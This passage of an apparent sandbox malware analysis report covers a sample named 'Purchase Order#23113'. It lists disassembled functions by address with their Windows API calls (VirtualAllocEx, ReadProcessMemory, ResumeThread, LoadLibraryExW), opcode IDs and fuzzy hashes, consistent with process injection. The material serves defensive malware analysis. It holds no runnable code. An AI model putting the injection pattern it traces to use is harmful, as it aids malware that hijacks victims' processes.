                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: daee27c01c0538345c4bf3c577a57ab527213dfde6ab81c41eb54be14336998f
                                                                            • Instruction ID: c70e9de2657680b5833b625a9adfac228c8826fca475f960ffb659efafab0ed6
                                                                            • Opcode Fuzzy Hash: daee27c01c0538345c4bf3c577a57ab527213dfde6ab81c41eb54be14336998f
                                                                            • Instruction Fuzzy Hash: 7421B3B59002589FDB10CF9AD584ADEBFF4EB48310F14841AE958A7350D378A954CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142B219 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0142B079,00000800,00000000,00000000), ref: 0142B28A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: d2114b0738a598a08b0f05203ade294107595f3ae077f8206294b18448374857
                                                                            • Instruction ID: 36a062507ffb2ae33ae1922ee1edd3985b4d456a48432455aa12268fda0fe7dd
                                                                            • Opcode Fuzzy Hash: d2114b0738a598a08b0f05203ade294107595f3ae077f8206294b18448374857
                                                                            • Instruction Fuzzy Hash: 9C2103B69003588FDB10CFAAC448ADEFFF4EB49310F54842AD559A7310C375A585CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0142B079,00000800,00000000,00000000), ref: 0142B28A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 76d81bf6bcf9c231d3444baa99b3a786fef06639aad821890e3dec7aba1f7131
                                                                            • Instruction ID: d771f0379a057906bf6512486fadcfd145cd1c262903843656d8453148eaa258
                                                                            • Opcode Fuzzy Hash: 76d81bf6bcf9c231d3444baa99b3a786fef06639aad821890e3dec7aba1f7131
                                                                            • Instruction Fuzzy Hash: AF1114B69043188FDB10CF9AD448ADEFBF4EB89310F50842AD519A7310C375A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6D40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FB6DAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: a150d58d420f6603100780d5e0d2ca72b02ccb155e2074ead41bd7a0ecb6748b
                                                                            • Instruction ID: 19070811b7dfdb090837b98efa09980bd34db864ce2886c05d165b381745484e
                                                                            • Opcode Fuzzy Hash: a150d58d420f6603100780d5e0d2ca72b02ccb155e2074ead41bd7a0ecb6748b
                                                                            • Instruction Fuzzy Hash: 4A1167B29002499FCB20DFAAC844BDEFFF5EF88320F148819E519A7250C735A554CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6D42 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FB6DAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 4c78816a1c45dcec63d758886bb22622b0da8a366f4d6287b1e489f6da950749
                                                                            • Instruction ID: f5f01e568f51b4222304d31d109b0a5336ad62817320ac260165d21888371161
                                                                            • Opcode Fuzzy Hash: 4c78816a1c45dcec63d758886bb22622b0da8a366f4d6287b1e489f6da950749
                                                                            • Instruction Fuzzy Hash: DB1137B29002499FCB20DFAAC844BEEBFF5EF88324F148819E559A7250C7359554CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6BB0 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 9d691c908866494957fbc7107127a83476081b0dbdef6ad55201cb0ddbbf0adc
                                                                            • Instruction ID: d33c0c975c82669f0fbcc1010161fdf88f5c6f2a9d9116eae6e8d81ad14aeebe
                                                                            • Opcode Fuzzy Hash: 9d691c908866494957fbc7107127a83476081b0dbdef6ad55201cb0ddbbf0adc
                                                                            • Instruction Fuzzy Hash: 371146B19002498EDB20DFAAC444BEEFBF4EB88324F248519D059A7290C7396944CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6BB8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 53668e0c654371fe1e3e23d0ee07e17719b7b1b00ad966678738e944a1a9a1c6
                                                                            • Instruction ID: 740d6d427d2db1fea70eb0111c8ebdcc97cf685d722655be2188fb938ac2db4a
                                                                            • Opcode Fuzzy Hash: 53668e0c654371fe1e3e23d0ee07e17719b7b1b00ad966678738e944a1a9a1c6
                                                                            • Instruction Fuzzy Hash: EB1136B1D002598FDB20DFAAC445BDEFBF4EB88324F248429D459A7250CB79A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0142AFFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: f65771d398db668f4818b8b8f1a2d093c6b7eef95bf08e01997b2637e7938b0b
                                                                            • Instruction ID: d9041ce006f6fe31fae8cee136771ea1be01220345b3a34b559f784b5efdb844
                                                                            • Opcode Fuzzy Hash: f65771d398db668f4818b8b8f1a2d093c6b7eef95bf08e01997b2637e7938b0b
                                                                            • Instruction Fuzzy Hash: 291113B5C002598FDB10CF9AC444BDEFBF4EB48314F10841AD928A7710C379A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB92A0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07FB92FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 0153ca5649fda9669669df1d79a20dfca297ba3621bb9b9a2a6bc5ab4375c994
                                                                            • Instruction ID: 2ca8075ec5ca0bf9e10cf2e0b951dd1955c032eee1e08dcd435136c0f55b8d22
                                                                            • Opcode Fuzzy Hash: 0153ca5649fda9669669df1d79a20dfca297ba3621bb9b9a2a6bc5ab4375c994
                                                                            • Instruction Fuzzy Hash: 9B11D3B5800359DFDB20DF9AD485BDEFBF8EB48320F148419D558A7250C375A544CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB9298 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07FB92FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: f8a22e4be6ad241f0afbaf2d1acb7d2b54f951f64182b027ef4ea2ccbce5a4fb
                                                                            • Instruction ID: 93ba8fb415e57bb33df1ab741bd95fb005b2a2f2d10094b3859a81ffc7f8478a
                                                                            • Opcode Fuzzy Hash: f8a22e4be6ad241f0afbaf2d1acb7d2b54f951f64182b027ef4ea2ccbce5a4fb
                                                                            • Instruction Fuzzy Hash: F01103B5904349CFEB10CF99D584BDEFBF4AB08324F24885AD558A7250C378A544CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6FC8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FB6F70
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 7ae35179b6cf8aa4cb9add0d2c64f19049130ada76cb1df2c05157db1881c82e
                                                                            • Instruction ID: 2af362c199b68351c9ddd53ec37d4783b445e6a1e320bfdb75673a52f3b724d3
                                                                            • Opcode Fuzzy Hash: 7ae35179b6cf8aa4cb9add0d2c64f19049130ada76cb1df2c05157db1881c82e
                                                                            • Instruction Fuzzy Hash: 1601AFB2800219DFDF20DF99C8047EEFBB0FF48324F18841AE5A9A71A0C7399455EB21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6843C Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            • Opcode ID: fa1c14444060b64420d2b1aa3f2c1601389ba0b9be5a86f63212cdb298a410da
                                                                            • Instruction ID: 8cdf71abaeaa1c9672bb234350821701b1ee7d983d2c88c31e9b861e721be544
                                                                            • Opcode Fuzzy Hash: fa1c14444060b64420d2b1aa3f2c1601389ba0b9be5a86f63212cdb298a410da
                                                                            • Instruction Fuzzy Hash: CB419C31B002068FCB05DB79989897EBBF7FFC8260B248969E419DB290DF74EC058791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6B08C Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            • Opcode ID: 843d0546474c0b2a67eadf8afe2d0cde413d55e0f4f1a30bac6cd0a710f350e8
                                                                            • Instruction ID: 13ed0e77313df2695aae9ed4fc16f8eae6f9ede8cf07e4b1767e50bfba192631
                                                                            • Opcode Fuzzy Hash: 843d0546474c0b2a67eadf8afe2d0cde413d55e0f4f1a30bac6cd0a710f350e8
                                                                            • Instruction Fuzzy Hash: 7B4115B5E102199FDB10CF99C584B9EBBF5FF48314F24846AE404EB260D7B8A945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AA00 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            • Opcode ID: 709d4e73c7c4e61c493a4e7c0aaaa7c91df98d28ba472410dceb9a6f74f0d499
                                                                            • Instruction ID: 1409eb78220c7836ba4252ebc89b38d9289f07d0e720456b003992ee6ebb71ba
                                                                            • Opcode Fuzzy Hash: 709d4e73c7c4e61c493a4e7c0aaaa7c91df98d28ba472410dceb9a6f74f0d499
                                                                            • Instruction Fuzzy Hash: D8112E35B0021A8BCF54EBB999105EFB6F6BFD8210B50407AC505F7344EB399E06CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6B6B0 Relevance: .2, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 738429aa04d029a8dfbaa3de5b4a2bc1661019c022ba9e667e4ae8cf6249e246
                                                                            • Instruction ID: 0f46f5f0bc0cfb40a58022be3cd99ad24d7b70f58fd50117b7e38d53df5002c3
                                                                            • Opcode Fuzzy Hash: 738429aa04d029a8dfbaa3de5b4a2bc1661019c022ba9e667e4ae8cf6249e246
                                                                            • Instruction Fuzzy Hash: AC611935A00619DFCB14DFA9C494AADBBF2FF88310F218159E909EB360DB75AD45CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6B6A2 Relevance: .2, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b593c59149c82782d1c29327eab9e6dc58057c5445e107c819242f6fdaf14164
                                                                            • Instruction ID: 9ab0ef0a9473bf81c878c484b42ff94d3f3e50ffde98e1690ced74b443d2f9ac
                                                                            • Opcode Fuzzy Hash: b593c59149c82782d1c29327eab9e6dc58057c5445e107c819242f6fdaf14164
                                                                            • Instruction Fuzzy Hash: A4610935A00619DFDB14DFA9C594AADBBF2FF88314F118159E809EB360DB74AD85CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68CC0 Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a661ad0f57520e525fbc9433af9fc0ff2943a8a6b1df14e1fe378c1237d45e90
                                                                            • Instruction ID: 5618535b6f30b1994a2bb705766af68f8e627e99272afaf5c7641ecd7d0ccc03
                                                                            • Opcode Fuzzy Hash: a661ad0f57520e525fbc9433af9fc0ff2943a8a6b1df14e1fe378c1237d45e90
                                                                            • Instruction Fuzzy Hash: 6A51A078E012089FDB48DFA9D485AEEBBF2FB89310F109069E805B7355CB35A946CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68710 Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dafc741ea6dcc1fa99cf620b1c012aeb76fcd9ee494065fc8ea2cb444a9a972
                                                                            • Instruction ID: 89d46e45916dde71fb65222c3f49eaad389bccc3ab089c617abb2f7a8c1daa3a
                                                                            • Opcode Fuzzy Hash: 6dafc741ea6dcc1fa99cf620b1c012aeb76fcd9ee494065fc8ea2cb444a9a972
                                                                            • Instruction Fuzzy Hash: 46419F74909684DFC706CB6AD594948BFF1FF4A200B2680C6D885DB273DB35AE05CB16
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B66738 Relevance: .1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8569459cb9edfd261bc602cfa4430efc283ace27ae863cff3ce4ea2ee3a86946
                                                                            • Instruction ID: 8669704616b7568f64d6eda7b010291d5fa663a97bf3369de3dc78ee54519ce3
                                                                            • Opcode Fuzzy Hash: 8569459cb9edfd261bc602cfa4430efc283ace27ae863cff3ce4ea2ee3a86946
                                                                            • Instruction Fuzzy Hash: AF418B74E5021ADFCB04CFA5D9456AEFBF2FB88300F10C5AAD815A7250E778AA00CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68B58 Relevance: .1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b74ef9db24bdf63c7a741c1a9d31873c1b2b490e0382e546d931bf998a479178
                                                                            • Instruction ID: ca9c07597354a343246f45ebcc736bfd47214a04cdf32e4ba38b4953fb2a6cb2
                                                                            • Opcode Fuzzy Hash: b74ef9db24bdf63c7a741c1a9d31873c1b2b490e0382e546d931bf998a479178
                                                                            • Instruction Fuzzy Hash: F841C078E112199FCB00DFA9D484AEEBBF2FB48320F149555E811A3354D735A995CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AD14 Relevance: .1, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f67a3f80d880b666c2ab435f80f82cf4c99587c1291590d013ecc9a11ea6d102
                                                                            • Instruction ID: 6c6b6809c748fd11b14f8ca4e004d51f2d2f8715c16d15c60d3f7daa8269a16a
                                                                            • Opcode Fuzzy Hash: f67a3f80d880b666c2ab435f80f82cf4c99587c1291590d013ecc9a11ea6d102
                                                                            • Instruction Fuzzy Hash: 2C41BC719043889FCB00DFA9D845A9EBFF5EF49310F0484AAE949E7251C739A804CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B66748 Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 271248150c56abdee6a9975f7f6c56a2f13b402275bee6edf668266496d603be
                                                                            • Instruction ID: 83abc4b99da0b958ef5f6b978b215ad255c6f63044ac44752ca78888feee7699
                                                                            • Opcode Fuzzy Hash: 271248150c56abdee6a9975f7f6c56a2f13b402275bee6edf668266496d603be
                                                                            • Instruction Fuzzy Hash: B94178B4E5020ADFCB04CFA5D945AAEFBF2FB88300F10D5AAD815A7250D778AA00CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68CB0 Relevance: .1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47c88bfc658eb713989351190477af7950e3b15c9252c0674430fd3bcc666b19
                                                                            • Instruction ID: 0023f0d9a6dc5a2eade5a20333d2dbcdfc3fd9ab7d4546276e475a078a96a8b1
                                                                            • Opcode Fuzzy Hash: 47c88bfc658eb713989351190477af7950e3b15c9252c0674430fd3bcc666b19
                                                                            • Instruction Fuzzy Hash: 0241E674E002199FDB44DFA9D480AEEBBF2FF88314F149069E805A7355DB39A846CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6A740 Relevance: .1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 985b7142c0339f51d703f6bf50e084a84573f7c06732ca8e9b92e1d7dc2d6cea
                                                                            • Instruction ID: 756ffb0b492a7d897eff563b3752bb951ccf16bed4bca44c25da2e7c63f97d5d
                                                                            • Opcode Fuzzy Hash: 985b7142c0339f51d703f6bf50e084a84573f7c06732ca8e9b92e1d7dc2d6cea
                                                                            • Instruction Fuzzy Hash: 35411474E04209DBCF04CFA9D9445EEFBB6FB88200F1084AAE915B7344DB386A41CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6A730 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: afdfceab8d22ef8b078482cc724515a3c46dc2bf2a8aed6b1537308230f8e83b
                                                                            • Instruction ID: 42204ea72eafdf859fbee128ddb0fd872e70b917dd40c9df64eee5ed5ee3349d
                                                                            • Opcode Fuzzy Hash: afdfceab8d22ef8b078482cc724515a3c46dc2bf2a8aed6b1537308230f8e83b
                                                                            • Instruction Fuzzy Hash: 95413674E04209DBCF04CFA9D9456EEFBB2FB88210F10846AE815B7244DB786A41CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6D938 Relevance: .1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2add01a6c6ff22383d89e26d2499941e83c3dcd1d087f2ccafc213b5becdb2bd
                                                                            • Instruction ID: 847f66582c080c40c930c3e5c12d09987c160dc54c93acc1ac4668daea6ad365
                                                                            • Opcode Fuzzy Hash: 2add01a6c6ff22383d89e26d2499941e83c3dcd1d087f2ccafc213b5becdb2bd
                                                                            • Instruction Fuzzy Hash: 66311870E04209DFDB48DFAAC5446AEBBB2FF89300F14D5AAD406A7290DB34AA40CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68362 Relevance: .1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c66fe3b361b27ada3a3a29f7331cf2944cb8ed66ae7e8af24169f83a7283ee8a
                                                                            • Instruction ID: 0f0d0d343b5346c99bbb22989445f223730d9af69a22f73f631e413ceb4db567
                                                                            • Opcode Fuzzy Hash: c66fe3b361b27ada3a3a29f7331cf2944cb8ed66ae7e8af24169f83a7283ee8a
                                                                            • Instruction Fuzzy Hash: E221062645ABF05AE702BF6CE9B12D67FA09F52225F0540A3C1C48D077D94984DEC2EE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B66618 Relevance: .1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
